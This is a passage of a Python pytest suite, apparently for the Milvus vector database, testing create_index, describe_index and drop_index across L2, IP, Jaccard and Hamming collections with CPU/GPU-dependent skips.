logging.getLogger().info(result)
assert result._params == index_param
assert result._collection_name == collection
assert result._index_type == index_type
def test_describe_and_drop_index_multi_collections(self, connect, get_simple_index):
'''
target: test create, describe and drop index interface with multiple collections of L2
method: create collections and add vectors in it, create index, call describe index
        expected: return code 0, and index structure
'''
nq = 100
vectors = gen_vectors(nq, dim)
collection_list = []
for i in range(10):
collection_name = gen_unique_str()
collection_list.append(collection_name)
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
connect.create_collection(param)
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
logging.getLogger().info(get_simple_index)
status, ids = connect.add_vectors(collection_name=collection_name, records=vectors)
status = connect.create_index(collection_name, index_type, index_param)
assert status.OK()
for i in range(10):
status, result = connect.describe_index(collection_list[i])
logging.getLogger().info(result)
assert result._params == index_param
assert result._collection_name == collection_list[i]
assert result._index_type == index_type
for i in range(10):
status = connect.drop_index(collection_list[i])
assert status.OK()
status, result = connect.describe_index(collection_list[i])
logging.getLogger().info(result)
assert result._collection_name == collection_list[i]
assert result._index_type == IndexType.FLAT
# @pytest.mark.level(2)
# def test_describe_index_without_connect(self, dis_connect, collection):
# '''
# target: test describe index without connection
# method: describe index, and check if describe successfully
# expected: raise exception
# '''
# with pytest.raises(Exception) as e:
# status = dis_connect.describe_index(collection)
def test_describe_index_collection_not_existed(self, connect):
'''
target: test describe index interface when collection name not existed
        method: describe index using a collection name that has not been created
expected: return code not equals to 0, describe index failed
'''
collection_name = gen_unique_str(self.__class__.__name__)
status, result = connect.describe_index(collection_name)
assert not status.OK()
def test_describe_index_collection_None(self, connect):
'''
target: test describe index interface when collection name is None
        method: create collection and add vectors in it, describe index with a collection_name of None
expected: return code not equals to 0, describe index failed
'''
collection_name = None
with pytest.raises(Exception) as e:
status = connect.describe_index(collection_name)
def test_describe_index_not_create(self, connect, collection):
'''
target: test describe index interface when index not created
        method: create collection and add vectors in it, then describe index without creating one
        expected: return code 0, and the default index information is returned
'''
status, ids = connect.add_vectors(collection, vectors)
status, result = connect.describe_index(collection)
logging.getLogger().info(result)
assert status.OK()
# assert result._params["nlist"] == index_params["nlist"]
# assert result._collection_name == collection
# assert result._index_type == index_params["index_type"]
"""
******************************************************************
The following cases are used to test `drop_index` function
******************************************************************
"""
def test_drop_index(self, connect, collection, get_simple_index):
'''
target: test drop index interface
method: create collection and add vectors in it, create index, call drop index
expected: return code 0, and default index param
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
# status, ids = connect.add_vectors(collection, vectors)
status = connect.create_index(collection, index_type, index_param)
assert status.OK()
status, result = connect.describe_index(collection)
logging.getLogger().info(result)
status = connect.drop_index(collection)
assert status.OK()
status, result = connect.describe_index(collection)
logging.getLogger().info(result)
assert result._collection_name == collection
assert result._index_type == IndexType.FLAT
@pytest.mark.level(2)
def test_drop_index_repeatly(self, connect, collection, get_simple_index):
'''
        target: test drop index repeatedly
method: create index, call drop index, and drop again
expected: return code 0
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
# status, ids = connect.add_vectors(collection, vectors)
status = connect.create_index(collection, index_type, index_param)
assert status.OK()
status, result = connect.describe_index(collection)
logging.getLogger().info(result)
status = connect.drop_index(collection)
assert status.OK()
status = connect.drop_index(collection)
assert status.OK()
status, result = connect.describe_index(collection)
logging.getLogger().info(result)
assert result._collection_name == collection
assert result._index_type == IndexType.FLAT
# @pytest.mark.level(2)
# def test_drop_index_without_connect(self, dis_connect, collection):
# '''
# target: test drop index without connection
# method: drop index, and check if drop successfully
# expected: raise exception
# '''
# with pytest.raises(Exception) as e:
# status = dis_connect.drop_index(collection)
def test_drop_index_collection_not_existed(self, connect):
'''
target: test drop index interface when collection name not existed
        method: drop index using a collection name that has not been created
expected: return code not equals to 0, drop index failed
'''
collection_name = gen_unique_str(self.__class__.__name__)
status = connect.drop_index(collection_name)
assert not status.OK()
def test_drop_index_collection_None(self, connect):
'''
target: test drop index interface when collection name is None
        method: create collection and add vectors in it, drop index with a collection_name of None
expected: return code not equals to 0, drop index failed
'''
collection_name = None
with pytest.raises(Exception) as e:
status = connect.drop_index(collection_name)
def test_drop_index_collection_not_create(self, connect, collection):
'''
target: test drop index interface when index not created
        method: create collection and add vectors in it, then drop index without creating one
        expected: return code 0, drop index succeeds even though no index was created
'''
status, ids = connect.add_vectors(collection, vectors)
status, result = connect.describe_index(collection)
logging.getLogger().info(result)
# no create index
status = connect.drop_index(collection)
logging.getLogger().info(status)
assert status.OK()
@pytest.mark.level(2)
def test_create_drop_index_repeatly(self, connect, collection, get_simple_index):
'''
        target: test create / drop index repeatedly, use the same index params
method: create index, drop index, four times
expected: return code 0
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
# status, ids = connect.add_vectors(collection, vectors)
for i in range(2):
status = connect.create_index(collection, index_type, index_param)
assert status.OK()
status, result = connect.describe_index(collection)
logging.getLogger().info(result)
status = connect.drop_index(collection)
assert status.OK()
status, result = connect.describe_index(collection)
logging.getLogger().info(result)
assert result._collection_name == collection
assert result._index_type == IndexType.FLAT
def test_create_drop_index_repeatly_different_index_params(self, connect, collection):
'''
        target: test create / drop index repeatedly, use different index params
        method: create index, drop index, four times, each time using different index_params to create the index
expected: return code 0
'''
nlist = NLIST
indexs = [{"index_type": IndexType.IVFLAT, "index_param": {"nlist": nlist}}, {"index_type": IndexType.IVF_SQ8, "index_param": {"nlist": nlist}}]
# status, ids = connect.add_vectors(collection, vectors)
for i in range(2):
status = connect.create_index(collection, indexs[i]["index_type"], indexs[i]["index_param"])
assert status.OK()
status, result = connect.describe_index(collection)
logging.getLogger().info(result)
status = connect.drop_index(collection)
assert status.OK()
status, result = connect.describe_index(collection)
logging.getLogger().info(result)
assert result._collection_name == collection
assert result._index_type == IndexType.FLAT
class TestIndexIP:
@pytest.fixture(
scope="function",
params=gen_index()
)
def get_index(self, request, connect):
if str(connect._cmd("mode")[1]) == "CPU":
if request.param["index_type"] == IndexType.IVF_SQ8H:
pytest.skip("sq8h not support in CPU mode")
if str(connect._cmd("mode")[1]) == "GPU":
if request.param["index_type"] == IndexType.IVF_PQ:
pytest.skip("ivfpq not support in GPU mode")
if request.param["index_type"] == IndexType.RNSG:
pytest.skip("rnsg not support in ip")
return request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
if str(connect._cmd("mode")[1]) == "CPU":
if request.param["index_type"] == IndexType.IVF_SQ8H:
pytest.skip("sq8h not support in CPU mode")
if str(connect._cmd("mode")[1]) == "GPU":
if request.param["index_type"] == IndexType.IVF_PQ:
pytest.skip("ivfpq not support in GPU mode")
if request.param["index_type"] == IndexType.RNSG:
pytest.skip("rnsg not support in ip")
return request.param
"""
******************************************************************
The following cases are used to test `create_index` function
******************************************************************
"""
@pytest.mark.level(2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index(self, connect, ip_collection, get_simple_index):
'''
target: test create index interface
method: create collection and add vectors in it, create index
expected: return code equals to 0, and search success
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
logging.getLogger().info(get_simple_index)
status, ids = connect.add_vectors(ip_collection, vectors)
status = connect.create_index(ip_collection, index_type, index_param)
assert status.OK()
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_collection(self, connect, ip_collection, get_simple_index):
'''
target: test create index interface
method: create collection, create partition, and add vectors in it, create index on collection
expected: return code equals to 0, and search success
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
logging.getLogger().info(get_simple_index)
status = connect.create_partition(ip_collection, tag)
status, ids = connect.add_vectors(ip_collection, vectors, partition_tag=tag)
status = connect.create_index(ip_collection, index_type, index_param)
assert status.OK()
# @pytest.mark.level(2)
# def test_create_index_without_connect(self, dis_connect, ip_collection):
# '''
# target: test create index without connection
# method: create collection and add vectors in it, check if added successfully
# expected: raise exception
# '''
# nlist = NLIST
# index_type = IndexType.IVF_SQ8
# index_param = {"nlist": nlist}
# with pytest.raises(Exception) as e:
# status = dis_connect.create_index(ip_collection, index_type, index_param)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_search_with_query_vectors(self, connect, ip_collection, get_simple_index):
'''
target: test create index interface, search with more query vectors
method: create collection and add vectors in it, create index, with no manual flush
expected: return code equals to 0, and search success
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
logging.getLogger().info(get_simple_index)
status, ids = connect.add_vectors(ip_collection, vectors)
status = connect.create_index(ip_collection, index_type, index_param)
logging.getLogger().info(connect.describe_index(ip_collection))
query_vecs = [vectors[0], vectors[1], vectors[2]]
top_k = 5
search_param = get_search_param(index_type)
status, result = connect.search_vectors(ip_collection, top_k, query_vecs, params=search_param)
logging.getLogger().info(result)
assert status.OK()
assert len(result) == len(query_vecs)
# TODO: enable
@pytest.mark.timeout(BUILD_TIMEOUT)
@pytest.mark.level(2)
def _test_create_index_multiprocessing(self, connect, ip_collection, args):
'''
target: test create index interface with multiprocess
method: create collection and add vectors in it, create index
expected: return code equals to 0, and search success
'''
status, ids = connect.add_vectors(ip_collection, vectors)
def build(connect):
status = connect.create_index(ip_collection, IndexType.IVFLAT, {"nlist": NLIST})
assert status.OK()
process_num = 8
processes = []
for i in range(process_num):
m = get_milvus(args["ip"], args["port"], handler=args["handler"])
p = Process(target=build, args=(m,))
processes.append(p)
p.start()
time.sleep(0.2)
for p in processes:
p.join()
query_vec = [vectors[0]]
top_k = 1
search_param = {"nprobe": nprobe}
status, result = connect.search_vectors(ip_collection, top_k, query_vec, params=search_param)
assert len(result) == 1
assert len(result[0]) == top_k
assert result[0][0].distance == 0.0
# TODO: enable
@pytest.mark.timeout(BUILD_TIMEOUT)
def _test_create_index_multiprocessing_multicollection(self, connect, args):
'''
target: test create index interface with multiprocess
method: create collection and add vectors in it, create index
expected: return code equals to 0, and search success
'''
process_num = 8
loop_num = 8
processes = []
collection = []
j = 0
while j < (process_num*loop_num):
collection_name = gen_unique_str("test_create_index_multiprocessing")
collection.append(collection_name)
param = {'collection_name': collection_name,
'dimension': dim}
connect.create_collection(param)
j = j + 1
        def create_index(connect, idx):
            i = 0
            while i < loop_num:
                # assert connect.has_collection(collection[idx*loop_num+i])
                status, ids = connect.add_vectors(collection[idx*loop_num+i], vectors)
                status = connect.create_index(collection[idx*loop_num+i], IndexType.IVFLAT, {"nlist": NLIST})
                assert status.OK()
                query_vec = [vectors[0]]
                top_k = 1
                search_param = {"nprobe": nprobe}
                status, result = connect.search_vectors(collection[idx*loop_num+i], top_k, query_vec, params=search_param)
                assert len(result) == 1
                assert len(result[0]) == top_k
                assert result[0][0].distance == 0.0
                i = i + 1
        for i in range(process_num):
            m = get_milvus(args["ip"], args["port"], handler=args["handler"])
            p = Process(target=create_index, args=(m, i))
processes.append(p)
p.start()
time.sleep(0.2)
for p in processes:
p.join()
def test_create_index_no_vectors(self, connect, ip_collection):
'''
target: test create index interface when there is no vectors in collection
method: create collection and add no vectors in it, and then create index
expected: return code equals to 0
'''
nlist = NLIST
index_type = IndexType.IVF_SQ8
index_param = {"nlist": nlist}
status = connect.create_index(ip_collection, index_type, index_param)
assert status.OK()
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_no_vectors_then_add_vectors(self, connect, ip_collection, get_simple_index):
'''
target: test create index interface when there is no vectors in collection, and does not affect the subsequent process
method: create collection and add no vectors in it, and then create index, add vectors in it
expected: return code equals to 0
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
status = connect.create_index(ip_collection, index_type, index_param)
status, ids = connect.add_vectors(ip_collection, vectors)
assert status.OK()
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_same_index_repeatedly(self, connect, ip_collection):
'''
target: check if index can be created repeatedly, with the same create_index params
        method: create index after the index has been built
expected: return code success, and search ok
'''
nlist = NLIST
status, ids = connect.add_vectors(ip_collection, vectors)
index_type = IndexType.IVF_SQ8
index_param = {"nlist": nlist}
status = connect.create_index(ip_collection, index_type, index_param)
status = connect.create_index(ip_collection, index_type, index_param)
assert status.OK()
query_vec = [vectors[0]]
top_k = 1
search_param = {"nprobe": nprobe}
status, result = connect.search_vectors(ip_collection, top_k, query_vec, params=search_param)
assert len(result) == 1
assert len(result[0]) == top_k
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_different_index_repeatedly(self, connect, ip_collection):
'''
target: check if index can be created repeatedly, with the different create_index params
        method: create another index with different index_params after the index has been built
expected: return code 0, and describe index result equals with the second index params
'''
nlist = NLIST
status, ids = connect.add_vectors(ip_collection, vectors)
index_type_1 = IndexType.IVF_SQ8
index_type_2 = IndexType.IVFLAT
indexs = [{"index_type": index_type_1, "index_param": {"nlist": nlist}}, {"index_type": index_type_2, "index_param": {"nlist": nlist}}]
logging.getLogger().info(indexs)
for index in indexs:
status = connect.create_index(ip_collection, index["index_type"], index["index_param"])
assert status.OK()
status, result = connect.describe_index(ip_collection)
assert result._params["nlist"] == nlist
assert result._collection_name == ip_collection
assert result._index_type == index_type_2
"""
******************************************************************
The following cases are used to test `describe_index` function
******************************************************************
"""
def test_describe_index(self, connect, ip_collection, get_simple_index):
'''
target: test describe index interface
method: create collection and add vectors in it, create index, call describe index
        expected: return code 0, and index structure
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
logging.getLogger().info(get_simple_index)
# status, ids = connect.add_vectors(ip_collection, vectors[:5000])
status = connect.create_index(ip_collection, index_type, index_param)
status, result = connect.describe_index(ip_collection)
logging.getLogger().info(result)
assert result._collection_name == ip_collection
status, mode = connect._cmd("mode")
if str(mode) == "GPU" and index_type == IndexType.IVF_PQ:
assert result._index_type == IndexType.FLAT
assert result._params["nlist"] == NLIST
else:
assert result._index_type == index_type
assert result._params == index_param
def test_describe_index_partition(self, connect, ip_collection, get_simple_index):
'''
target: test describe index interface
method: create collection, create partition and add vectors in it, create index, call describe index
        expected: return code 0, and index structure
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
logging.getLogger().info(get_simple_index)
status = connect.create_partition(ip_collection, tag)
status, ids = connect.add_vectors(ip_collection, vectors, partition_tag=tag)
status = connect.create_index(ip_collection, index_type, index_param)
status, result = connect.describe_index(ip_collection)
logging.getLogger().info(result)
assert result._params == index_param
assert result._collection_name == ip_collection
assert result._index_type == index_type
def test_describe_index_partition_A(self, connect, ip_collection, get_simple_index):
'''
target: test describe index interface
method: create collection, create partitions and add vectors in it, create index on partitions, call describe index
        expected: return code 0, and index structure
'''
new_tag = "new_tag"
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
logging.getLogger().info(get_simple_index)
status = connect.create_partition(ip_collection, tag)
status = connect.create_partition(ip_collection, new_tag)
# status, ids = connect.add_vectors(ip_collection, vectors, partition_tag=tag)
# status, ids = connect.add_vectors(ip_collection, vectors, partition_tag=new_tag)
status = connect.create_index(ip_collection, index_type, index_param)
status, result = connect.describe_index(ip_collection)
logging.getLogger().info(result)
assert result._params == index_param
assert result._collection_name == ip_collection
assert result._index_type == index_type
def test_describe_and_drop_index_multi_collections(self, connect, get_simple_index):
'''
target: test create, describe and drop index interface with multiple collections of IP
method: create collections and add vectors in it, create index, call describe index
        expected: return code 0, and index structure
'''
nq = 100
vectors = gen_vectors(nq, dim)
collection_list = []
for i in range(10):
collection_name = gen_unique_str()
collection_list.append(collection_name)
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.IP}
connect.create_collection(param)
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
logging.getLogger().info(get_simple_index)
status, ids = connect.add_vectors(collection_name=collection_name, records=vectors)
status = connect.create_index(collection_name, index_type, index_param)
assert status.OK()
for i in range(10):
status, result = connect.describe_index(collection_list[i])
logging.getLogger().info(result)
assert result._params == index_param
assert result._collection_name == collection_list[i]
assert result._index_type == index_type
for i in range(10):
status = connect.drop_index(collection_list[i])
assert status.OK()
status, result = connect.describe_index(collection_list[i])
logging.getLogger().info(result)
assert result._collection_name == collection_list[i]
assert result._index_type == IndexType.FLAT
# @pytest.mark.level(2)
# def test_describe_index_without_connect(self, dis_connect, ip_collection):
# '''
# target: test describe index without connection
# method: describe index, and check if describe successfully
# expected: raise exception
# '''
# with pytest.raises(Exception) as e:
# status = dis_connect.describe_index(ip_collection)
def test_describe_index_not_create(self, connect, ip_collection):
'''
target: test describe index interface when index not created
        method: create collection and add vectors in it, then describe index without creating one
        expected: return code 0, and the default index information is returned
'''
status, ids = connect.add_vectors(ip_collection, vectors)
status, result = connect.describe_index(ip_collection)
logging.getLogger().info(result)
assert status.OK()
# assert result._params["nlist"] == index_params["nlist"]
# assert result._collection_name == collection
# assert result._index_type == index_params["index_type"]
"""
******************************************************************
The following cases are used to test `drop_index` function
******************************************************************
"""
def test_drop_index(self, connect, ip_collection, get_simple_index):
'''
target: test drop index interface
method: create collection and add vectors in it, create index, call drop index
expected: return code 0, and default index param
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
status, mode = connect._cmd("mode")
assert status.OK()
# status, ids = connect.add_vectors(ip_collection, vectors)
status = connect.create_index(ip_collection, index_type, index_param)
if str(mode) == "GPU" and (index_type == IndexType.IVF_PQ):
assert not status.OK()
else:
assert status.OK()
status, result = connect.describe_index(ip_collection)
logging.getLogger().info(result)
status = connect.drop_index(ip_collection)
assert status.OK()
status, result = connect.describe_index(ip_collection)
logging.getLogger().info(result)
assert result._collection_name == ip_collection
assert result._index_type == IndexType.FLAT
def test_drop_index_partition(self, connect, ip_collection, get_simple_index):
'''
target: test drop index interface
method: create collection, create partition and add vectors in it, create index on collection, call drop collection index
expected: return code 0, and default index param
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
status = connect.create_partition(ip_collection, tag)
status, ids = connect.add_vectors(ip_collection, vectors, partition_tag=tag)
status = connect.create_index(ip_collection, index_type, index_param)
assert status.OK()
status, result = connect.describe_index(ip_collection)
logging.getLogger().info(result)
status = connect.drop_index(ip_collection)
assert status.OK()
status, result = connect.describe_index(ip_collection)
logging.getLogger().info(result)
assert result._collection_name == ip_collection
assert result._index_type == IndexType.FLAT
def test_drop_index_partition_C(self, connect, ip_collection, get_simple_index):
'''
target: test drop index interface
method: create collection, create partitions and add vectors in it, create index on partitions, call drop partition index
expected: return code 0, and default index param
'''
new_tag = "new_tag"
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
status = connect.create_partition(ip_collection, tag)
status = connect.create_partition(ip_collection, new_tag)
status, ids = connect.add_vectors(ip_collection, vectors)
status = connect.create_index(ip_collection, index_type, index_param)
assert status.OK()
status = connect.drop_index(ip_collection)
assert status.OK()
status, result = connect.describe_index(ip_collection)
logging.getLogger().info(result)
assert result._collection_name == ip_collection
assert result._index_type == IndexType.FLAT
@pytest.mark.level(2)
def test_drop_index_repeatly(self, connect, ip_collection, get_simple_index):
'''
        target: test drop index repeatedly
method: create index, call drop index, and drop again
expected: return code 0
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
# status, ids = connect.add_vectors(ip_collection, vectors)
status, mode = connect._cmd("mode")
assert status.OK()
# status, ids = connect.add_vectors(ip_collection, vectors)
status = connect.create_index(ip_collection, index_type, index_param)
if str(mode) == "GPU" and (index_type == IndexType.IVF_PQ):
assert not status.OK()
else:
assert status.OK()
status, result = connect.describe_index(ip_collection)
logging.getLogger().info(result)
status = connect.drop_index(ip_collection)
assert status.OK()
status = connect.drop_index(ip_collection)
assert status.OK()
status, result = connect.describe_index(ip_collection)
logging.getLogger().info(result)
assert result._collection_name == ip_collection
assert result._index_type == IndexType.FLAT
# @pytest.mark.level(2)
# def test_drop_index_without_connect(self, dis_connect, ip_collection):
# '''
# target: test drop index without connection
# method: drop index, and check if drop successfully
# expected: raise exception
# '''
# nlist = NLIST
# index_type = IndexType.IVFLAT
# index_param = {"nlist": nlist}
# with pytest.raises(Exception) as e:
# status = dis_connect.drop_index(ip_collection, index_type, index_param)
def test_drop_index_collection_not_create(self, connect, ip_collection):
'''
target: test drop index interface when index not created
        method: create collection and add vectors in it, then drop index without creating one
        expected: return code 0, drop index succeeds even though no index was created
'''
status, ids = connect.add_vectors(ip_collection, vectors)
status, result = connect.describe_index(ip_collection)
logging.getLogger().info(result)
# no create index
status = connect.drop_index(ip_collection)
logging.getLogger().info(status)
assert status.OK()
@pytest.mark.level(2)
def test_create_drop_index_repeatly(self, connect, ip_collection, get_simple_index):
'''
        target: test create / drop index repeatedly, use the same index params
method: create index, drop index, four times
expected: return code 0
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
status, ids = connect.add_vectors(ip_collection, vectors)
for i in range(2):
status = connect.create_index(ip_collection, index_type, index_param)
assert status.OK()
status, result = connect.describe_index(ip_collection)
logging.getLogger().info(result)
status = connect.drop_index(ip_collection)
assert status.OK()
status, result = connect.describe_index(ip_collection)
logging.getLogger().info(result)
assert result._collection_name == ip_collection
assert result._index_type == IndexType.FLAT
def test_create_drop_index_repeatly_different_index_params(self, connect, ip_collection):
'''
        target: test create / drop index repeatedly, use different index params
        method: create index, drop index, four times, each time using different index_params to create the index
expected: return code 0
'''
nlist = NLIST
indexs = [{"index_type": IndexType.IVFLAT, "index_param": {"nlist": nlist}}, {"index_type": IndexType.IVF_SQ8, "index_param": {"nlist": nlist}}]
status, ids = connect.add_vectors(ip_collection, vectors)
for i in range(2):
status = connect.create_index(ip_collection, indexs[i]["index_type"], indexs[i]["index_param"])
assert status.OK()
status, result = connect.describe_index(ip_collection)
assert result._params == indexs[i]["index_param"]
assert result._collection_name == ip_collection
assert result._index_type == indexs[i]["index_type"]
status, result = connect.describe_index(ip_collection)
logging.getLogger().info(result)
status = connect.drop_index(ip_collection)
assert status.OK()
status, result = connect.describe_index(ip_collection)
logging.getLogger().info(result)
assert result._collection_name == ip_collection
assert result._index_type == IndexType.FLAT
class TestIndexJAC:
tmp, vectors = gen_binary_vectors(nb, dim)
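    # Class-level binary vectors for the Jaccard metric; tests reference them as self.vectors
    # so the module-level float vectors are not used by mistake.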
@pytest.fixture(
scope="function",
params=gen_index()
)
def get_index(self, request, connect):
if str(connect._cmd("mode")[1]) == "CPU":
if request.param["index_type"] == IndexType.IVF_SQ8H:
pytest.skip("sq8h not support in CPU mode")
if str(connect._cmd("mode")[1]) == "GPU":
if request.param["index_type"] == IndexType.IVF_PQ:
pytest.skip("ivfpq not support in GPU mode")
return request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
if str(connect._cmd("mode")[1]) == "CPU":
if request.param["index_type"] == IndexType.IVF_SQ8H:
pytest.skip("sq8h not support in CPU mode")
if str(connect._cmd("mode")[1]) == "GPU":
if request.param["index_type"] == IndexType.IVF_PQ:
pytest.skip("ivfpq not support in GPU mode")
return request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_jaccard_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] == IndexType.IVFLAT or request.param["index_type"] == IndexType.FLAT:
return request.param
else:
pytest.skip("Skip index Temporary")
"""
******************************************************************
The following cases are used to test `create_index` function
******************************************************************
"""
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index(self, connect, jac_collection, get_jaccard_index):
'''
target: test create index interface
method: create collection and add vectors in it, create index
expected: return code equals to 0, and search success
'''
index_param = get_jaccard_index["index_param"]
index_type = get_jaccard_index["index_type"]
logging.getLogger().info(get_jaccard_index)
status, ids = connect.add_vectors(jac_collection, self.vectors)
status = connect.create_index(jac_collection, index_type, index_param)
if index_type != IndexType.FLAT and index_type != IndexType.IVFLAT:
assert not status.OK()
else:
assert status.OK()
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_partition(self, connect, jac_collection, get_jaccard_index):
'''
target: test create index interface
method: create collection, create partition, and add vectors in it, create index
expected: return code equals to 0, and search success
'''
index_param = get_jaccard_index["index_param"]
index_type = get_jaccard_index["index_type"]
logging.getLogger().info(get_jaccard_index)
status = connect.create_partition(jac_collection, tag)
status, ids = connect.add_vectors(jac_collection, self.vectors, partition_tag=tag)
status = connect.create_index(jac_collection, index_type, index_param)
assert status.OK()
# @pytest.mark.level(2)
# def test_create_index_without_connect(self, dis_connect, jac_collection):
# '''
# target: test create index without connection
# method: create collection and add vectors in it, check if added successfully
# expected: raise exception
# '''
# nlist = NLIST
# index_param = {"nlist": nlist}
# with pytest.raises(Exception) as e:
# status = dis_connect.create_index(jac_collection, IndexType.IVF_SQ8, index_param)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_search_with_query_vectors(self, connect, jac_collection, get_jaccard_index):
'''
target: test create index interface, search with more query vectors
method: create collection and add vectors in it, create index
expected: return code equals to 0, and search success
'''
index_param = get_jaccard_index["index_param"]
index_type = get_jaccard_index["index_type"]
logging.getLogger().info(get_jaccard_index)
status, ids = connect.add_vectors(jac_collection, self.vectors)
status = connect.create_index(jac_collection, index_type, index_param)
logging.getLogger().info(connect.describe_index(jac_collection))
query_vecs = [self.vectors[0], self.vectors[1], self.vectors[2]]
top_k = 5
search_param = get_search_param(index_type)
status, result = connect.search_vectors(jac_collection, top_k, query_vecs, params=search_param)
logging.getLogger().info(result)
assert status.OK()
assert len(result) == len(query_vecs)
"""
******************************************************************
The following cases are used to test `describe_index` function
******************************************************************
"""
def test_describe_index(self, connect, jac_collection, get_jaccard_index):
'''
target: test describe index interface
method: create collection and add vectors in it, create index, call describe index
        expected: return code 0, and index structure
'''
index_param = get_jaccard_index["index_param"]
index_type = get_jaccard_index["index_type"]
logging.getLogger().info(get_jaccard_index)
# status, ids = connect.add_vectors(jac_collection, vectors[:5000])
status = connect.create_index(jac_collection, index_type, index_param)
status, result = connect.describe_index(jac_collection)
logging.getLogger().info(result)
assert result._collection_name == jac_collection
assert result._index_type == index_type
assert result._params == index_param
def test_describe_index_partition(self, connect, jac_collection, get_jaccard_index):
'''
target: test describe index interface
method: create collection, create partition and add vectors in it, create index, call describe index
        expected: return code 0, and index structure
'''
index_param = get_jaccard_index["index_param"]
index_type = get_jaccard_index["index_type"]
logging.getLogger().info(get_jaccard_index)
status = connect.create_partition(jac_collection, tag)
        status, ids = connect.add_vectors(jac_collection, self.vectors, partition_tag=tag)
status = connect.create_index(jac_collection, index_type, index_param)
status, result = connect.describe_index(jac_collection)
logging.getLogger().info(result)
assert result._params == index_param
assert result._collection_name == jac_collection
assert result._index_type == index_type
"""
******************************************************************
The following cases are used to test `drop_index` function
******************************************************************
"""
def test_drop_index(self, connect, jac_collection, get_jaccard_index):
'''
target: test drop index interface
method: create collection and add vectors in it, create index, call drop index
expected: return code 0, and default index param
'''
index_param = get_jaccard_index["index_param"]
index_type = get_jaccard_index["index_type"]
status, mode = connect._cmd("mode")
assert status.OK()
# status, ids = connect.add_vectors(ip_collection, vectors)
status = connect.create_index(jac_collection, index_type, index_param)
assert status.OK()
status, result = connect.describe_index(jac_collection)
logging.getLogger().info(result)
status = connect.drop_index(jac_collection)
assert status.OK()
status, result = connect.describe_index(jac_collection)
logging.getLogger().info(result)
assert result._collection_name == jac_collection
assert result._index_type == IndexType.FLAT
def test_drop_index_partition(self, connect, jac_collection, get_jaccard_index):
'''
target: test drop index interface
method: create collection, create partition and add vectors in it, create index on collection, call drop collection index
expected: return code 0, and default index param
'''
index_param = get_jaccard_index["index_param"]
index_type = get_jaccard_index["index_type"]
status = connect.create_partition(jac_collection, tag)
        status, ids = connect.add_vectors(jac_collection, self.vectors, partition_tag=tag)
status = connect.create_index(jac_collection, index_type, index_param)
assert status.OK()
status, result = connect.describe_index(jac_collection)
logging.getLogger().info(result)
status = connect.drop_index(jac_collection)
assert status.OK()
status, result = connect.describe_index(jac_collection)
logging.getLogger().info(result)
assert result._collection_name == jac_collection
assert result._index_type == IndexType.FLAT
class TestIndexBinary:
tmp, vectors = gen_binary_vectors(nb, dim)
@pytest.fixture(
scope="function",
params=gen_index()
)
def get_index(self, request, connect):
if str(connect._cmd("mode")[1]) == "CPU":
if request.param["index_type"] == IndexType.IVF_SQ8H:
pytest.skip("sq8h not support in CPU mode")
if request.param["index_type"] == IndexType.IVF_PQ or request.param["index_type"] == IndexType.HNSW:
pytest.skip("Skip PQ Temporary")
return request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
if str(connect._cmd("mode")[1]) == "CPU":
if request.param["index_type"] == IndexType.IVF_SQ8H:
pytest.skip("sq8h not support in CPU mode")
if request.param["index_type"] == IndexType.IVF_PQ or request.param["index_type"] == IndexType.HNSW:
pytest.skip("Skip PQ Temporary")
return request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_hamming_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] == IndexType.IVFLAT or request.param["index_type"] == IndexType.FLAT:
return request.param
else:
pytest.skip("Skip index Temporary")
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_substructure_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] == IndexType.FLAT:
return request.param
else:
pytest.skip("Skip index Temporary")
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_superstructure_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] == IndexType.FLAT:
return request.param
else:
pytest.skip("Skip index Temporary")
"""
******************************************************************
The following cases are used to test `create_index` function
******************************************************************
"""
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index(self, connect, ham_collection, get_hamming_index):
'''
target: test create index interface
method: create collection and add vectors in it, create index
expected: return code equals to 0, and search success
'''
index_param = get_hamming_index["index_param"]
index_type = get_hamming_index["index_type"]
logging.getLogger().info(get_hamming_index)
